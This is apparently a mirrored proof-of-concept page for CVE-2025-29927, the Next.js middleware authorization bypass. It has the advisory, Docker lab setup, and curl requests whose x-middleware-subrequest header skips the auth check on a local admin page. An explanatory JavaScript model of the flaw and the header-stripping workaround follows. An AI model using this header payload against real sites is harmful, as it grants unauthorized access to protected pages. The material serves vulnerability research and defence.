CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Source: https://github.com/l1uk/nextjs-middleware-exploit

Associated vulnerability
Title: Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description: Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommended that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.

Repository description: Research on the Next.js middleware vulnerability (CVE-2025-29927) allowing authorization bypass and potential exploits.

Readme
# Next.js Middleware Vulnerability Research (CVE-2025-29927)

This repository demonstrates a critical **vulnerability in Next.js** middleware (CVE-2025-29927), affecting versions from 11.1.4 up to, but not including, the fixed releases 12.3.5, 13.5.9, 14.2.25 and 15.2.3. The vulnerability allows **authorization bypass**, **CSP bypass**, and potential **DoS attacks** through cache poisoning. The root cause is the way the `x-middleware-subrequest` header is handled: Next.js used it internally to mark its own middleware sub-requests and skip the middleware for them, but an external client can send the same header, so any check implemented in middleware (authentication, authorization, security headers) is skipped for that request.

This proof of concept is specific to **v12**: the header value `pages/_middleware` is the name Next.js 12.0/12.1 gave to middleware defined in `pages/_middleware.js`. From 12.2 onward the middleware lives in a root `middleware.js` and is named differently, and 13.x–15.x additionally required the name to be repeated several times in the header before the skip took effect, so the literal `curl` payload below does not transfer unchanged to a newer target.

## Usage

### Environment setup

Set up the vulnerable environment using docker and the files from this repo by running:

```bash
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app
```

### Exploit 

This repository ships an `exploit.sh` script that runs the requests below against the container started above. To test it, run:

```bash
chmod +x exploit.sh
./exploit.sh
```

You can also reproduce the bypass manually with the following requests:

1. Request the admin page without authentication. You should get a 3xx redirect to the `login` page (`Location: /login`), because the middleware runs and rejects the unauthenticated request.

```bash
curl -i http://localhost:3000/admin
```

2. Request the same page, still without authentication, but with the `x-middleware-subrequest` header set to the middleware's internal name. The middleware is skipped and the admin page is served (HTTP 200) instead of the redirect.

```bash
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin
```
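
To make the mechanism behind the two requests concrete, the following is an added example written for this page; it is neither Next.js source nor code from the PoC repository. It models the pre-fix decision that skipped middleware when `x-middleware-subrequest` carried the middleware's own name (the v12 single-occurrence check used by this PoC, and the repeated-name depth check that later major versions used, per the public advisory and patch), and beside it the advisory's workaround of dropping that header from external requests before routing. The function names, the version/depth parameters and the cookie-based "authenticated" check are this example's own assumptions, not the repo's `_middleware.js` logic.

```javascript
// Added illustration for CVE-2025-29927; NOT Next.js source and NOT the repo's code.
// (a) vulnerableSkipsMiddleware: the pre-fix skip decision, as described in the advisory/patch.
// (b) stripSubrequestHeader:    the advisory's workaround (drop the header from external requests).
// Function names and parameters are this example's own assumptions.

// Depth limit that 13.x-15.x compared the repeated middleware name against (from the public patch).
const MAX_RECURSION_DEPTH = 5;

// True when the vulnerable server would bypass middleware for these request headers.
//   middlewareName: "pages/_middleware" for 12.0/12.1 (this repo's PoC),
//                   "middleware" or "src/middleware" for 12.2 and later.
//   version:        major version, selects which pre-fix check applied.
function vulnerableSkipsMiddleware(headers, middlewareName, version) {
  const raw = headers['x-middleware-subrequest'];
  const subrequests = typeof raw === 'string' ? raw.split(':') : [];
  if (version <= 12) {
    // 12.x: a single occurrence of the name in the colon-separated list was enough.
    return subrequests.includes(middlewareName);
  }
  // 13.x-15.x: the name had to appear MAX_RECURSION_DEPTH times.
  const depth = subrequests.filter((s) => s === middlewareName).length;
  return depth >= MAX_RECURSION_DEPTH;
}

// Advisory workaround: remove the header from anything arriving from outside the app.
// Header names compare case-insensitively, as HTTP requires.
function stripSubrequestHeader(headers) {
  return Object.fromEntries(
    Object.entries(headers).filter(([k]) => k.toLowerCase() !== 'x-middleware-subrequest')
  );
}

// Toy model of the protected /admin route. The cookie check is a constructed
// stand-in for whatever the repo's _middleware.js actually inspects.
function handleAdminRequest(headers, { middlewareName, version, stripHeader }) {
  const h = stripHeader ? stripSubrequestHeader(headers) : headers;
  if (vulnerableSkipsMiddleware(h, middlewareName, version)) {
    return { status: 200, body: 'admin page' }; // middleware never ran: this is the bypass
  }
  const authenticated = /(^|;\s*)session=/.test(h.cookie || '');
  return authenticated
    ? { status: 200, body: 'admin page' }
    : { status: 307, location: '/login' };
}

// Walk-through mirroring the two curl requests above (constructed headers).
const v12 = { middlewareName: 'pages/_middleware', version: 12, stripHeader: false };
const poc = { 'x-middleware-subrequest': 'pages/_middleware' };
console.log(handleAdminRequest({}, v12).status);                              // 307
console.log(handleAdminRequest(poc, v12).status);                             // 200
console.log(handleAdminRequest(poc, { ...v12, stripHeader: true }).status);   // 307
```

The practical point of the model: the skip decision is made from a client-controlled header before any of the application's own middleware code runs, so the fix cannot live inside the middleware. Either upgrade to a fixed release, or drop the header at the edge (reverse proxy, WAF, or a custom server in front of Next.js) so it never reaches the vulnerable check, which is what the advisory's workaround does.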

## Security Advisory

- **CVE-2025-29927**: [Security Advisory Link](https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw)
File Snapshot

```text
[4.0K] /data/pocs/03c9ebc5ffbfe0381ab55b9ddd8f87f48c6425e1
├── [ 365] Dockerfile
├── [ 665] exploit.sh
├── [  46] next.config.js
├── [ 242] package.json
├── [4.0K] pages
│   ├── [ 369] about.js
│   ├── [ 157] admin.js
│   ├── [ 375] index.js
│   ├── [ 550] login.js
│   └── [1.3K] _middleware.js
├── [1.6K] README.md
└── [4.0K] styles
    └── [ 119] global.css

2 directories, 11 files
```